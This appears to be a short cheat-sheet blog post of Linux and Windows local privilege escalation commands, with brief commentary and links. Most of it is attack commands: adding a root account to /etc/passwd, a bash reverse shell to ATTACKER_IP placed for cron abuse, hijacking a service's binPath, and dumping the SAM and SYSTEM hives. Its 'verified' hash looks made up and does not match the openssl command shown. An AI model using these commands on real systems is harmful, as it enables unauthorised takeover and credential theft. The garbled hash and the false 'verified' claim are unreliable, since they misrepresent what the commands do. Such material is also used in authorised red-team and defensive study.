Local Privileges Escalation

By /

https://lnkd.in/gXr2CWwU

Practice Verified Codes and Commands:

1. Linux Privilege Escalation Commands:

  • Check for SUID binaries:
    find / -perm -u=s -o -perm -g=s 2>/dev/null
  • Exploit writable /etc/passwd:
    openssl passwd -1 -salt exploit password123 
echo 'exploit:$1$exploit$d2hD5K4z8z9z8z9z8z9z8z:0:0:root:/root:/bin/bash' >> /etc/passwd 
su exploit
  • Exploit cron jobs:
    echo "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1" > exploit.sh 
chmod +x exploit.sh

2. Windows Privilege Escalation Commands:

  • Check for unquoted service paths:
    wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\"
  • Exploit weak service permissions:
    sc config ServiceName binPath= "C:\Path\To\Malicious.exe" 
sc start ServiceName
  • Dump SAM database for password hashes:
    reg save HKLM\SAM SAM.bak 
reg save HKLM\SYSTEM SYSTEM.bak

What Undercode Say:

Local privilege escalation is a critical aspect of offensive security, allowing attackers to gain higher-level access on a system. This article delves into techniques and methodologies for escalating privileges on both Linux and Windows systems. On Linux, attackers often exploit SUID binaries, writable files, and cron jobs. Commands like find, openssl, and `chmod` are essential for identifying and exploiting these vulnerabilities. On Windows, unquoted service paths, weak service permissions, and SAM database extraction are common vectors. Tools like wmic, sc, and `reg` are invaluable for these tasks.

Understanding these techniques is crucial for both red teamers and defenders. Red teams can use these methods to simulate real-world attacks, while defenders can identify and patch vulnerabilities. Always ensure you have proper authorization before attempting these techniques in a live environment. For further reading, refer to the provided URL and explore additional resources on privilege escalation.

Related URLs:

  • https://lnkd.in/gXr2CWwU
  • https://attack.mitre.org/techniques/T1068/
  • https://www.hackingarticles.in/linux-privilege-escalation/
  • https://www.hackingarticles.in/windows-privilege-escalation/

References:

Hackers Feeds, Undercode AIFeatured Image

Related Posts:

Scroll to Top